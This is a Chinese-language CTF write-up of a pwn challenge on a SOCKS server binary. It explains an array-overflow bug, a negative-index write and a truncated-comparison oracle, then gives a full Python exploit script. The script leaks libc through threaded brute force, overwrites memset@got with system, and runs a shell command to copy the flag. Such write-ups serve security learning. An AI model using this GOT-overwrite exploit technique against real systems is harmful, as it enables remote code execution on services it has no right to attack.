题目分析

函数名是 ai 恢复的,不过不影响看

题目实现了一个 sock server,每接收到一个连接,就会创建对应的 thread,routine 函数是 client_session_thread

image-20251029235234027

实现了 5 个功能,add、delete、proxy(6 和 default 没用)。并且题目管理了一个全局的 heap_idx 结构体,用于计算数组的偏移和当前数量。

image-20251029235240077

image-20251029235247518

还给了一个 flask 实现的 webserver,并且能访问的是白名单 index.html 和 flag.html,容器只给了一个 index,所以猜测 flag 是后续利用漏洞需要的

image-20251030213304806

漏洞一

漏洞点出在 delete 函数,这里是先--heap_idx->list_num然后才判断 chunk 是否存在,如果不存在也不会恢复heap_idx->list_num

image-20251029235413149

而 add 功能中会先判断heap_idx->list_num <= 100,然后把 heao 指针保存在heap_list[heap_idx->list_idx]

image-20251029235417050

那么我们先填满 heap_list,再 delete 的时候释放一个不存在的 chunk,我们就可以实现数组溢出了,看一下 bss 段的内容,相邻的正好是 heap_idx

image-20251029235421175

漏洞二

第二个漏洞回到 main 函数,heap_idx->index <= 100是有符号比较,检查通过后执行dword_405480[heap_idx->index - 1] = ++heap_idx->value,如果heap_idx->index可控,就可以实现负数溢出

image-20251029235431849

漏洞三

find_chunk 判断 chunk 是否存在,比较方法使用的是 bytes_equal,函数只会匹配到输入数据的长度,并且会被 00 截断

image-20251029235436249

image-20251029235438955

漏洞利用

利用思路:

根据上面的分析,我们可以通过漏洞一控制 heao_idx 结构体,然后利用漏洞二实现负数溢出能往 0x405480 之前的地址任意写入(每次 4 字节)。

0x405480 前面是 got 表,并且题目没有开随机化,所以可以把free@got的地址写入到heap_list[0]中,这样就是利用 find_chunk 爆破 libc 地址

image-20251029235443520

拿到 libc 地址后,因为 routine 函数结束的时候也调用了 free,所以不能直接改 free@got

image-20251029235446858

proxy 功能的 socks5_handle_connect 函数解析失败的时候会调用 memset 拷贝 error msg,而这个函数没有其他地方调用了,因此可以将 memset@got 改成 system

image-20251029235450370

image-20251029235457574

执行system("cat /flag > ./web/flag.html")后,利用 proxy 的功能访问内网端口获取 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwnkit import *
from construct import Struct, Switch, Byte, Bytes, Const, this, Pass, Rebuild, len_, Int16ub, Adapter
import socket
import struct
import threading


args = init_pwn_args()
binary = ELF("./sockserver")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
args.info.binary = context.binary = binary
args.info.target = {"host": args.host, "port": args.port}

host = "127.0.0.1"
port = 1080

""" >>> exploit goes here <<< """
srv = pwntube(args) if not args.remote else None


class Inet4Adapter(Adapter):
"""把 4 字节的 IPv4 与点分十进制字符串互转"""

def _encode(self, obj, context, path):
# 接受 "127.0.0.1" 或 b"\x7f\x00\x00\x01"
if isinstance(obj, (bytes, bytearray)):
return bytes(obj)
return socket.inet_aton(obj)

def _decode(self, obj, context, path):
return socket.inet_ntoa(obj)


PackCMD = Struct(
"magic" / Const(5, Byte),
"size" / Byte,
"data" / Byte[this.size],
)

PackConnect = Struct(
"magic1" / Const(5, Byte), # must be 0x05
"magic2" / Const(1, Byte), # must be 0x01 CONNECT (your C code checks this)
"magic3" / Const(0, Byte),
"addr_type" / Byte,
"bind_addr" / Switch(this.addr_type, {
1: Struct( # IPv4: 4 bytes addr + 2 bytes port
"ipv4" / Inet4Adapter(Bytes(4)),
"port" / Int16ub,
),
3: Struct( # DOMAIN: 1-byte len, domain bytes, 2 bytes port
"domain_len" / Rebuild(Byte, len_(this.domain)),
"domain" / Bytes(this.domain_len),
"port" / Int16ub,
),
}, default=Pass) # 如果遇到其他 addr_type,解析会落在 default(你也可以抛错)
)
MSG_0 = b"\x05\x00"
MSG_1 = b"\x05\x01"


def send_cmd(p, cmd):
p.send(PackCMD.build({
"size": len(p8(cmd)),
"data": p8(cmd),
}))
p.recvuntil(p8(0x05) + p8(cmd))


def add(p, data):
send_cmd(p, 0x03)
p.recvuntil(MSG_0)
p.send(data)
p.recvuntil(MSG_0)


def delete(p, data):
send_cmd(p, 0x04)
p.recvuntil(MSG_1)
p.send(data)
# p.recvuntil(MSG_0)


def my_exit(p):
send_cmd(p, 0x01)


def write2addr(p, addr, value):
offset = ((addr - 0x405480) // 4) & 0xffffffffffffffff
p = remote(host, port)
payload = p64(0)
payload += p64(99)
payload += p64((offset + 1) & 0xffffffffffffffff) # heap_list[0]
payload += p64((value - 1) & 0xffffffffffffffff)
add(p, payload)
p.close()


def clean_idx(p):
p = remote(host, port)
payload = p64(0)
payload += p64(99)
payload += p64(0 + 1)
payload += p64(1 - 1)
add(p, payload)
p.close()


def brute_worker(start, end) -> None:
global libc_leak
for i in range(start, end + 1):
# 检查是否已经有其他线程找到了结果
if found_flag.is_set():
log.info(f"Thread {threading.current_thread().name} exiting early, result already found")
return

p = remote(host, port)
send_cmd(p, 0x05)
p.recvuntil(MSG_1)
p.send(libc_leak + p8(i) + b"\x00")
res = p.recv(2)
p.close()

if res == MSG_0:
# 使用锁保护共享变量
with found_lock:
if not found_flag.is_set(): # 双重检查,确保只有一个线程处理结果
log.success(f"found byte of libc: {hex(i)}")
libc_leak += p8(i)
found_flag.set() # 设置标志,通知其他线程退出


# fill heap list
for i in range(100):
p = remote(host, port)
add(p, b"\x00")
p.close()


# global num-1
p = remote(host, port)
delete(p, "aaaa")
p.close()

# write heap_list[0] to free@got
write2addr(p, 0x405140, 0x405018 + 8)
write2addr(p, 0x405144, 0)
clean_idx(p)

libc_leak = bytes(0)
found_lock = threading.Lock()
found_flag = threading.Event() # 用于通知其他线程退出

THREAD_NUM = 15
threads = []

# 计算每个线程处理的范围
total_range = 255 # 1到255,共255个数
chunk_size = total_range // THREAD_NUM
remainder = total_range % THREAD_NUM

for _ in range(6):
found_flag.clear()
for i in range(THREAD_NUM):
# 计算当前线程的起始和结束位置
start = 1 + i * chunk_size + min(i, remainder)
end = start + chunk_size - 1
if i < remainder: # 前remainder个线程多分配一个数
end += 1

print(f"Thread {i}: {start}-{end}")

thread = threading.Thread(target=brute_worker, args=(start, end), name=f"BruteWorker-{i}")
threads.append(thread)
thread.start()

# 等待所有线程完成,或者等待找到结果
for thread in threads:
thread.join()

print(libc_leak, len(libc_leak))

libc_leak = uu64(libc_leak)
libc_base = libc_leak - libc.symbols["free"]
bin_sh_addr = libc_base + next(libc.search(b"/bin/sh\x00"))
system_addr = libc_base + libc.symbols["system"]
plog.address(libc_base=libc_base)

# write heap_list[0] to bin_sh_addr
write2addr(p, 0x405140, bin_sh_addr & 0xffffffff)
write2addr(p, 0x405140 + 4, (bin_sh_addr >> 32) & 0xffffffff)
clean_idx(p)

# write memset@got to system_addr
write2addr(p, 0x405058, system_addr & 0xffffffff)
write2addr(p, 0x405058 + 4, (system_addr >> 32) & 0xffffffff)
clean_idx(p)

p = remote(host, port)
send_cmd(p, 0x05)
p.recvuntil(MSG_1)
p.send(b"/bin/sh\x00") # for search
payload = p32(0xdeadbeef)
payload += b"cat /flag > ./web/flag.html"
p.send(payload)
p.close()

p = remote(host, port)
send_cmd(p, 0x05)
p.recvuntil(MSG_1)
p.send(b"/bin/sh\x00") # for search
p.send(PackConnect.build({
"addr_type": 1,
"bind_addr": {
"ipv4": "127.0.0.1",
"port": 8081,
}
}))
pause()

p.send("""
GET /flag.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: keep-alive
DNT: 1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0
Upgrade-Insecure-Requests: 1
""".strip())

p.interactive()